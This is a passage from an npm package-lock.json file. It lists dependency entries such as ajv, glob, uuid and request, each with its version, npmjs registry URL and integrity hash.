{ "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", 